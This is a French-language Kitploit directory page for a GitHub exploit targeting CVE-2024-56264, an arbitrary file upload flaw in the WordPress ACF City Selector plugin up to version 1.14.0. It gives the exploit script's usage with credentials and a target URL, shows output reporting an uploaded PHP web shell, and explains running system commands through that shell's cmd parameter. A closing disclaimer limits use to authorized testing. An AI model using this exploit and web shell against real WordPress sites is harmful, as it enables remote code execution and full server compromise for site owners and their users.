Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-56264 — Plugin WordPress ACF City Selector <= 1.14.0 - Vulnérabilité de téléchargement arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-56264
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-56264

CVE-2024-56264

Plugin WordPress ACF City Selector <= 1.14.0 - Vulnérabilité de téléchargement arbitraire de fichiers

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-56264

Exploit de téléchargement arbitraire de fichier dans WordPress ACF City Selector (CVE-2024-56264)

Présentation

Ce dépôt contient un exploit pour CVE-2024-56264, qui est une vulnérabilité de téléchargement arbitraire de fichier trouvée dans le plugin WordPress ACF City Selector (versions <= 1.14.0). Cette vulnérabilité permet à un attaquant de télécharger un fichier PHP malveillant (web shell) sur une instance WordPress vulnérable et d'exécuter des commandes arbitraires sur le serveur.

Détails de la CVE

  • Identifiant CVE : CVE-2024-56264
  • Date de publication : 2 janvier 2025
  • Plugin concerné : ACF City Selector
  • Versions vulnérables : <= 1.14.0
  • Impact : Exécution de code à distance (RCE) via un téléchargement de fichier sans restriction

Description

Le plugin ACF City Selector ne valide pas correctement les fichiers téléchargés, permettant aux attaquants de contourner les restrictions et de télécharger des fichiers PHP arbitraires. Une fois qu'un fichier PHP malveillant est téléchargé, un attaquant peut exécuter des commandes système à distance, entraînant un compromis total du serveur.

Prérequis

📌 Dépendances

Assurez-vous d'avoir installé ce qui suit avant d'exécuter le script :

  • Python 3.x
  • Module requests (Installer avec : pip install requests)

Vous pouvez installer toutes les dépendances nécessaires en utilisant :

root@kitploit:~
pip install -r requirements.txt

🚀 Utilisation

Exécution de l'exploit :

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           affiche ce message d'aide et quitte
  --url URL            URL de base du site (ex. : http://192.168.100.74/wordpress)
  --username USERNAME  Nom d'utilisateur WordPress
  --password PASSWORD  Mot de passe WordPress

Exemple :

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Sortie attendue

En cas d'exploitation réussie, vous devriez voir :

root@kitploit:~
[+] Version du plugin détectée : 1.14.0
[+] Version vulnérable détectée ! Poursuite de l'exploitation.
[+] Connexion réussie.
[+] Nonce extrait : abc1234
[+] Shell téléchargé avec succès : http://wordpress/wp-content/uploads/acfcs/q.php

Post-exploitation

En cas de succès, accédez au shell téléchargé via :

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Cela permet l'exécution de commandes à distance sur le serveur.

⚠ Avertissement

Ce script est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée est illégale et peut entraîner de graves conséquences. L'auteur n'est pas responsable de toute utilisation abusive de cet exploit.

Télécharger l’outil